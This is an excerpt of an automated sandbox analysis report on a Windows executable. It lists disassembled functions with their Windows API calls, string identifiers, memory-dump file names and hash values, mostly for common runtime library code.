                                                                                                                                                                                                                          • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                          • Opcode ID: 1fec75a7a2eead9af1f1dd0893e9f937b3761287506d9b310f4ea8fdf1d5c513
                                                                                                                                                                                                                          • Instruction ID: 171ffaf35e7d3c65d70412a763a60c2270fbfa00c15cab0ce9641801f6c2caed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fec75a7a2eead9af1f1dd0893e9f937b3761287506d9b310f4ea8fdf1d5c513
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B241AE21B0C68281FBA2BB55A9411FA63E0FF54794F484031DA4E87AD6EF3DE5078708
                                                                                                                                                                                                                          Function 00007FF641F2DD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                          • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                          • Instruction ID: dc37461c10ea2de66efa85340948f0c16f9f25f183db5203a40b7f5d145b8385
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9D15C32A0CB8186EBA1BB6594403ED77E0FB55788F200135EA4D97BDADF39E492C741
                                                                                                                                                                                                                          Function 00007FF641F2CFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF641F2D29A,?,?,?,00007FF641F2CF8C,?,?,?,00007FF641F2CB89), ref: 00007FF641F2D06D
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F2D29A,?,?,?,00007FF641F2CF8C,?,?,?,00007FF641F2CB89), ref: 00007FF641F2D07B
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF641F2D29A,?,?,?,00007FF641F2CF8C,?,?,?,00007FF641F2CB89), ref: 00007FF641F2D0A5
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF641F2D29A,?,?,?,00007FF641F2CF8C,?,?,?,00007FF641F2CB89), ref: 00007FF641F2D113
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF641F2D29A,?,?,?,00007FF641F2CF8C,?,?,?,00007FF641F2CB89), ref: 00007FF641F2D11F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                          • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                          • Instruction ID: 7d85c24eef2a4c5b6555e8c5145ceb6ad1e945f041b2649673a5d1b4a6cc2003
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0318B21A1EA8281EB93FB56A8006A923D4FF48BA4F594535DD2D873D9EE3DE4478204
                                                                                                                                                                                                                          Function 00007FF641F3A460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                          • Opcode ID: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                                                                          • Instruction ID: 5c00632d4f0e97f41fc5477ef6f858e2cb9798f6284000220b84694d7053e2ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB211820B0C64A42FBEAB3269A4517D61C25F887B0F544734E93ECBEE7DE2CA4534702
                                                                                                                                                                                                                          Function 00007FF641F4707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                          • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                          • Instruction ID: 23378460c7ec4a14b04c8e9bb479f11e66fbd08f318460a1ff31d3e1aab34405
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E118E31B2CA4286E792BB56E948329A2E0FB98BE4F004234EA1DC77D5DF3CD405C744
                                                                                                                                                                                                                          Function 00007FF641F281F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F2821D
                                                                                                                                                                                                                          • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F2827A
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F286B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF641F23FA4,00000000,00007FF641F21925), ref: 00007FF641F286E9
                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F28305
                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F28364
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F28375
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,00000000,?,00007FF641F239F2), ref: 00007FF641F2838A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3462794448-0
                                                                                                                                                                                                                          • Opcode ID: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                                                                                                                                                          • Instruction ID: 56958c58e40fb4fb5a3dbb9ac5171d2a725aaef28e120fc482b4af5060bb8ced
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42418F72A1D6C281EBB2BB12A5042EA63D4FB85B80F844135DF9D977DADE3DE402C704
                                                                                                                                                                                                                          Function 00007FF641F3A5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A5E7
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A61D
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A64A
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A65B
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A66C
                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A,?,?,?,?,00007FF641F3649F), ref: 00007FF641F3A687
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                          • Opcode ID: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                                                                          • Instruction ID: fc90cafcd80f745276c2dee56635485c1590386a05fe6af269c9a45ee2ae8915
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58110630B0C64A42FBDAB726965117D66C29F887A0F148734E83ECBED7DE2CA4535702
                                                                                                                                                                                                                          Function 00007FF641F22300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                          • Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                                                          • Instruction ID: 7a79c833a04c94c959466f71197d0359a629a019eb156524635c70550ebfed61
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9318F32A1CA8689EB61FF61E8552F963A0FF89784F440135EA4D87B9ADF3CD106C701
                                                                                                                                                                                                                          Function 00007FF641F22760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                          • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                          • API String ID: 1878133881-640379615
                                                                                                                                                                                                                          • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                          • Instruction ID: abb4f63d93d37dfeefe08b16f9ad6eaaa88f707d6a8cf1a1d49432c19fb20057
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3215C7262CAC681E761FB50F4517EA63A4FB94784F400036EA8C83ADADF7CD646CB44
                                                                                                                                                                                                                          Function 00007FF641F38DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                          • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                          • Instruction ID: bcec700ecbcf5a0013aed16c01152070b5c52d426ea8734c623ebd66ea3f8ce7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45F06271A1DB0681EB51BB64E85837953A0AF95761F940735C96DC76F5CF2CD04BC304
                                                                                                                                                                                                                          Function 00007FF641F48678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                          • Instruction ID: 2a96b8367cace1afad692a6396fe394f5d90613a5233e6c68f2f231d7c099768
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6511BF72EDCA0301F7E631E9D66537501C06F763A4F990634EA6EC76D68E2CA8438110
                                                                                                                                                                                                                          Function 00007FF641F3A6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF641F398B3,?,?,00000000,00007FF641F39B4E,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F3A6BF
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F398B3,?,?,00000000,00007FF641F39B4E,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F3A6DE
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F398B3,?,?,00000000,00007FF641F39B4E,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F3A706
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F398B3,?,?,00000000,00007FF641F39B4E,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F3A717
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF641F398B3,?,?,00000000,00007FF641F39B4E,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F3A728
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                          • Opcode ID: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                          • Instruction ID: 55a59b89116f444730a51805d09b10599f0baa8b9d3eec15cb4270552081143d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC110A20B0C64A42FBDBB326569127961D15F997A0E544334E83ECBED7DE2CA8538702
                                                                                                                                                                                                                          Function 00007FF641F3A534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                          • Opcode ID: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                          • Instruction ID: 9590f6274f9a0b8e925eff4ed37dfae0f324e541414a8ae9e047de414f35a999
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82119321B0D20F42FBEBB22655511B922C25F99360E585738D93ECBED3EE2CB4535213
                                                                                                                                                                                                                          Function 00007FF641F352B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
